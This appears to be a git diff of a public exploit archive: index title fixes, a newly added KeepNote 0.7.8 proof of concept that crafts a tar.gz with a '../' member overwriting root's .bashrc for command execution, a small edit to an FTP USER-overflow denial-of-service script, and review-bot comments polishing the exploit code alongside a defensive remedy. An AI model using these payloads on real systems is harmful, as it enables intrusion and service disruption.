+8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0
 8898,platforms/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0
 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0
 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0
@@ -8554,7 +8554,7 @@ id,file,description,date,author,platform,type,port
 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0
 9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0
 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0
-9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - (GET Request) Remote Denial of Service",2009-07-01,Stack,hardware,dos,0
+9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service",2009-07-01,Stack,hardware,dos,0
 9068,platforms/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0
 9069,platforms/php/webapps/9069.txt,"CMS chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0
 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
@@ -9085,7 +9085,7 @@ id,file,description,date,author,platform,type,port
 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflows (SEH)",2009-09-09,hack4love,windows,local,0
 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus - vx(asx/wax/wvx) Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,windows,local,0
 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0
-9621,platforms/windows/dos/9621.txt,"Kolibri+ WebServer 2 - (Get Request) Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0
+9621,platforms/windows/dos/9621.txt,"Kolibri+ WebServer 2 - GET Request Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0
 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0
 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0
 9624,platforms/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,windows,local,0
@@ -9108,7 +9108,7 @@ id,file,description,date,author,platform,type,port
 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3)",2009-09-11,"Ramon Valle",linux,local,0
 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812
 9643,platforms/windows/remote/9643.txt,"kolibri+ WebServer 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0
-9644,platforms/windows/remote/9644.py,"Kolibri+ WebServer 2 - (GET Request) Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80
+9644,platforms/windows/remote/9644.py,"Kolibri+ WebServer 2 - GET Request Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80
 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0
 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0
 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0
@@ -9121,7 +9121,7 @@ id,file,description,date,author,platform,type,port
 9654,platforms/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0
 9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,windows,local,0
 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0
-9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0
+9657,platforms/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0
 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0
 9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",windows,local,0
 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0
@@ -9423,7 +9423,7 @@ id,file,description,date,author,platform,type,port
 10050,platforms/php/webapps/10050.pl,"EZRecipeZee CMS 91 - File Inclusion",2009-10-12,kaMtiEz,php,webapps,0
 10051,platforms/php/webapps/10051.txt,"QuickCart 3.x - Cross-Site Scripting / Cross-Site Request Forgery / Local File Inclusion / Directory Traversal",2009-10-08,kl3ryk,php,webapps,0
 10052,platforms/php/webapps/10052.txt,"The BMW - inventory.php SQL Injection",2009-10-08,Dazz,php,webapps,0
-10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - Get Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80
+10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - GET Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80
 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0
 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80
 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235
@@ -12865,7 +12865,7 @@ id,file,description,date,author,platform,type,port
 14678,platforms/php/dos/14678.txt,"PHP 5.3.3 - ibase_gen_id() Off-by-One Overflow",2010-08-18,"Canberk BOLAT",php,dos,0
 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service",2010-08-18,"C.G. Tan",windows,dos,0
 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0
-14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)",2010-08-18,Dr_IDE,windows,dos,0
+14683,platforms/windows/dos/14683.py,"httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)",2010-08-18,Dr_IDE,windows,dos,0
 14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure",2010-08-18,"Nikola Petrov",php,webapps,0
 14685,platforms/windows/dos/14685.pl,"RockN Wav Editor 1.8 - Denial of Service",2010-08-18,d4rk-h4ck3r,windows,dos,0
 14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,"mc2_s3lector ",php,webapps,0
@@ -14542,7 +14542,7 @@ id,file,description,date,author,platform,type,port
 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0
-16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0
+16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0
 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21
 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0
 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
@@ -14604,12 +14604,12 @@ id,file,description,date,author,platform,type,port
 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999
 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - webquery.dll Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80
-16794,platforms/windows/remote/16794.rb,"HTTPDX - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80
+16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80
 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0
 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80
 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0
-16799,platforms/windows/remote/16799.rb,"HTTPDX - h_handlepeer() Function Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0
+16799,platforms/windows/remote/16799.rb,"httpdx - h_handlepeer() Function Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0
 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)",2010-06-11,Metasploit,windows,remote,8000
 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5250
16802,platforms/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0
@@ -15732,7 +15732,7 @@ id,file,description,date,author,platform,type,port
 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0
 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)",2011-11-09,Node,windows,remote,0
 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0
-18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT Arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0
+18105,platforms/linux/local/18105.sh,"glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0
 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,windows,dos,0
 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,windows,dos,0
 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local,0
@@ -16509,7 +16509,7 @@ id,file,description,date,author,platform,type,port
 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0
 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
 19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - Uploadify.php Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,php,webapps,0
-19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
+19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0
 40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0
@@ -17346,7 +17346,7 @@ id,file,description,date,author,platform,type,port
 19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key Parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0
 19986,platforms/windows/dos/19986.txt,"Oxide WebServer 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos,0
 19987,platforms/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0
-19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0
+19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - HTTP Server Remote Denial of Service",2012-07-20,st3n,windows,dos,0
 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0
 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man - /tmp Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0
 19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0
@@ -18899,7 +18899,8 @@ id,file,description,date,author,platform,type,port
 21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,windows,remote,0
 21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0
 21599,platforms/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting",2002-07-08,"Matthew Murphy",windows,remote,0
-21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - Get Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0
+21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0
+40440,platforms/multiple/local/40440.py,"KeepNote 0.7.8 - Command Execution",2016-09-29,R-73eN,multiple,local,0
 21601,platforms/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow",2002-07-08,"Matthew Murphy",windows,remote,0
 21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal Information Disclosure",2002-07-09,glaive,linux,remote,0
 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",multiple,remote,0
@@ -19229,7 +19230,7 @@ id,file,description,date,author,platform,type,port
 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote,0
 21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 - add.php Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps,0
 21934,platforms/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",linux,remote,0
-21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long Get Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0
+21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0
 21936,platforms/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,linux,remote,0
 21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x - Log() Function Buffer Overflow",2002-10-07,flea,linux,remote,0
 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0
@@ -19888,7 +19889,7 @@ id,file,description,date,author,platform,type,port
 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0
 22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos,0
 22609,platforms/windows/remote/22609.txt,"Snowblind 1.0/1.1 - Web Server File Disclosure",2003-05-16,euronymous,windows,remote,0
-22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - (GET Request) Buffer Overflow",2003-05-16,euronymous,windows,dos,0
+22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow",2003-05-16,euronymous,windows,dos,0
 22611,platforms/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x - PageServices Information Disclosure",1998-08-16,anonymous,multiple,remote,0
 22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0
 22613,platforms/freebsd/local/22613.pl,"Maelstrom Server 3.0.x - Argument Buffer Overflow (1)",2003-05-20,"Luca Ercoli",freebsd,local,0
@@ -20070,7 +20071,7 @@ id,file,description,date,author,platform,type,port
 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0
 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0
 22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Exploit",2003-06-17,dr_insane,php,webapps,0
-22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long Get Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0
+22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long GET Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0
 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,windows,remote,0
 22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",linux,dos,0
 22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0
diff --git a/platforms/multiple/local/40440.py b/platforms/multiple/local/40440.py
new file mode 100755
index 000000000..d584a69fb
--- /dev/null
+++ b/platforms/multiple/local/40440.py
@@ -0,0 +1,45 @@
+# Title : KeepNote 0.7.8 Remote Command Execution
+# Date : 29/09/2016
+# Author : R-73eN
+# Twitter : https://twitter.com/r_73en
+# Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7)
+# Software : http://keepnote.org/index.shtml#download
+# Vendor : ~
+#
+# DESCRIPTION:
+#
+# When the KeepNote imports a backup which is actuallt a tar.gz file doesn't checks for " ../ " characters
+# which makes it possible to do a path traversal and write anywhere in the system(where the user has writing permissions).
+# This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run.
+# There are a lot of ways but i choose this just for demostration purposes and its supposed we run the keepnote application
+# as root (default in kali linux which this bug is tested).
+#
+#
+
+
+banner = ""
+banner +=" ___ __ ____ _ _ \n"
+banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
+banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
+banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
+banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
+print banner
+
+import tarfile, sys
+
+if(len(sys.argv) != 2):
+ print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
+ print "[+] Example: python exploit.py test.txt"
+ exit(0)
+print "[+] Creating Exploit File [+]"
+
+filename = "KeepNoteBackup.tar.gz"
+
+path = "../../../../../../../home/root/.bashrc"
+
+tf = tarfile.open(filename,"w:gz")
+tf.add(sys.argv[1], path)
+tf.close()
+
+print "[+] Created KeepNoteBackup.tar.gz successfully [+]"
+
diff --git a/platforms/windows/dos/11343.py b/platforms/windows/dos/11343.py
index 42ebf140a..7bd833bed 100755
--- a/platforms/windows/dos/11343.py
+++ b/platforms/windows/dos/11343.py
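Review bot: `tf = tarfile.open(filename,"w:gz")` followed by `tf.add(sys.argv[1], path)` and `tf.close()` leaves the archive handle open and the gzip stream unterminated whenever `tf.add` raises (for example when the argument path does not exist), so a truncated `KeepNoteBackup.tar.gz` is left behind; a context manager closes it on every path: `with tarfile.open(filename, "w:gz") as tf:` then `    tf.add(sys.argv[1], path)`. The usage branch calls `exit(0)`, which reports success to the calling shell for an argument error; `sys.exit(1)` is the conventional value and `sys` is imported just above the check. The file is added with mode 100755 but has no shebang, and `print banner` is Python 2-only syntax, so a first line of `#!/usr/bin/env python2` would make the interpreter requirement explicit rather than leaving it to be discovered at run time. On the defensive side, the header describes the standard archive-traversal class: an importer must normalise each member name and reject any that resolves outside the destination directory before extracting, and if the importer relies on Python's `tarfile` the `filter="data"` extraction filter (Python 3.12, backported to maintained 3.8–3.11 releases) refuses such members.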
@@ -18,4 +18,4 @@ connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's addre
 s.recv(1024)
 s.send('USER '+ buffer +'\r\n') #yup, doesn't take much does it.
 s.recv(1024) #
-s.close #don't really need these, force of habit
\ No newline at end of file
+s.close() #don't really need these, force of habit
\ No newline at end of file
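Review bot: The trailing comment `#don't really need these, force of habit` is now stale: before this change the bare `s.close` was a no-op attribute access, whereas the new `s.close()` actually releases the descriptor, so the comment should say what the call is for, e.g. `# release the socket; without the parentheses this line did nothing`. The call is also only reached when the preceding `s.send`/`s.recv` return normally; if the peer drops the connection the exception propagates and the socket is left to the garbage collector, which a `with closing(s):` block around the session (or `try`/`finally`) would avoid, though the socket is created outside this hunk. The enclosing script starts before the hunk.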